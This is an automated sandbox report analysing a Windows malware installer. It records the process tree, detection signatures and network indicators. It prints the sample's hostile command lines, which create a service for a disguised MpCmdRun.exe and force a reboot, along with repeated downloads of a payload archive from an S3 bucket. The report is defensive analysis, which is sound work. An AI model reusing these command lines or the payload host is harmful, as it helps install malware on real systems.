Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WKYC506_2389030007-00901003007010_777380775_#U00b2.exe

Overview

General Information

Sample name:WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
renamed because original name is a hash value
Original sample name:WKYC506_2389030007-00901003007010_777380775_.exe
Analysis ID:1383277
MD5:511fdcc7fc2f4220353004cfb011f522
SHA1:93ef93aa71476734b1598037838cc6b9fc8b47f7
SHA256:b457a493fad9212b369552df689d67b5e1feec656451cf586abcc5411cee6e00
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WKYC506_2389030007-00901003007010_777380775_#U00b2.exe (PID: 6836 cmdline: "C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC MD5: 511FDCC7FC2F4220353004CFB011F522)
    • Update.exe (PID: 1360 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • Stand.exe (PID: 6244 cmdline: "C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrun MD5: A8AEC0D17F15C613DCCAD945FCF6F928)
        • rundll32.exe (PID: 7328 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2 MD5: EF3179D498793BF4234F708D3BE28633)
          • rundll32.exe (PID: 7344 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7472 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower MD5: EF3179D498793BF4234F708D3BE28633)
          • rundll32.exe (PID: 7516 cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower MD5: 889B99C52A60DD49227C5E485A016679)
            • cmd.exe (PID: 7796 cmdline: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 7852 cmdline: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • shutdown.exe (PID: 8004 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
              • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6740 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Extra\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        SourceRuleDescriptionAuthorStrings
        2.0.Update.exe.370000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC, CommandLine: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, NewProcessName: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, OriginalFileName: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, ParentCommandLine: "C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe" --rerunningWithoutUAC, ParentImage: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, ParentProcessId: 6836, ParentProcessName: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC, ProcessId: 1360, ProcessName: Update.exe
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7796, ParentProcessName: cmd.exe, ProcessCommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ProcessId: 7852, ProcessName: sc.exe
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6740, ProcessName: svchost.exe
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dllVirustotal: Detection: 10%Perma Link
          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJoe Sandbox ML: detected
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ExtraJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: unknownHTTPS traffic detected: 52.95.163.114:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: MpSvc.pdbGCTL source: MpSvc.dll.11.dr
          Source: Binary string: ConfigSecurityPolicy.pdb source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: NisSrv.pdb source: NisSrv.exe.11.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.11.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe.11.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe, 00000002.00000002.1701986264.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.dr
          Source: Binary string: ConfigSecurityPolicy.pdbOGPS source: ConfigSecurityPolicy.exe.11.dr
          Source: Binary string: MpRTP.pdb source: MpRtp.dll.11.dr
          Source: Binary string: MpRTP.pdbGCTL source: MpRtp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028D6000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.11.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe.11.dr
          Source: Binary string: shellext.pdb source: shellext.dll.11.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.11.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
          Source: Binary string: MpDetours.pdb source: MpDetours.dll.11.dr
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdb source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpDetours.pdbGCTL source: MpDetours.dll.11.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.11.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.11.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbx source: Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: NisSrv.pdbGCTL source: NisSrv.exe.11.dr
          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbIvan Medvedev source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpSvc.pdb source: MpSvc.dll.11.dr
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041ED3E4 FindFirstFileW,FindClose,7_2_041ED3E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041ECE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_041ECE18
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463D3E4 FindFirstFileW,FindClose,11_2_0463D3E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04654D5C FindFirstFileW,FindClose,11_2_04654D5C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0463CE18
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04652D1C GetLogicalDriveStringsW,QueryDosDeviceW,11_2_04652D1C

          Networking

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.95.163.114 443Jump to behavior
          Source: Yara matchFile source: Update.exe, type: SAMPLE
          Source: Yara matchFile source: 2.0.Update.exe.370000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Extra\Update.exe, type: DROPPED
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /falseSc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: b38709202.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0484AC78 Sleep,URLDownloadToFileW,Sleep,11_2_0484AC78
          Source: global trafficHTTP traffic detected: GET /falseSc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: b38709202.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: b38709202.s3.sa-east-1.amazonaws.com
          Source: NisSrv.exe.11.drString found in binary or memory: http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://bad
          Source: svchost.exe, 00000004.00000002.3306383339.0000020476E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.0000000002A6F000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000295E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/Extra.nuspec
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/_rels/.rels
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/Stand.exe
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/Stand.txt
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/Stand_ExecutionStub.exe
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/diskres.dll
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.0000000002A6F000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000295E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/ea39ec67dff34a7992442f15ea616f88.p
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
          Source: Update.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.txt
          Source: MpCommu.dll.11.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
          Source: MpCommu.dll.11.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: svchost.exe, 00000004.00000003.1693238700.0000020477018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: svchost.exe, 00000004.00000003.1693238700.0000020477018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: svchost.exe, 00000004.00000003.1693238700.0000020477018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: svchost.exe, 00000004.00000003.1693238700.0000020477018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: svchost.exe, 00000004.00000003.1693238700.000002047704D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: qmgr.db.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.or
          Source: MpCommu.dll.11.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmp, ThirdPartyNotices.txt.11.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: MpSvc.dll.11.drString found in binary or memory: https://aka.ms/NpBhFeedbackSinkholeMalicious-
          Source: MpSvc.dll.11.drString found in binary or memory: https://aka.ms/NpFeedbackunknownA
          Source: Update.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.drString found in binary or memory: https://api.github.com/#
          Source: rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b38709202.s3.sa-east-1.amazonaws.com/
          Source: rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b38709202.s3.sa-east-1.amazonaws.com/S
          Source: rundll32.exe, 0000000B.00000003.1861228727.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zip
          Source: rundll32.exe, 0000000B.00000002.3505654355.0000000002DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zipA
          Source: rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zipg
          Source: rundll32.exe, 0000000B.00000002.3505654355.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zipr
          Source: rundll32.exe, 0000000B.00000002.3506787301.0000000004946000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.ziprset
          Source: svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
          Source: svchost.exe, 00000004.00000003.1693238700.00000204770FF000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
          Source: svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
          Source: svchost.exe, 00000004.00000003.1693238700.00000204770A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.0000020477107000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.00000204770F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.00000204770E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
          Source: svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
          Source: ThirdPartyNotices.txt.11.drString found in binary or memory: https://github.com/Microsoft/cpprestsdk.
          Source: ThirdPartyNotices.txt.11.drString found in binary or memory: https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)
          Source: Update.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.drString found in binary or memory: https://github.com/myuser/myrepo
          Source: rundll32.exe, 0000000B.00000002.3505654355.0000000002DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comV
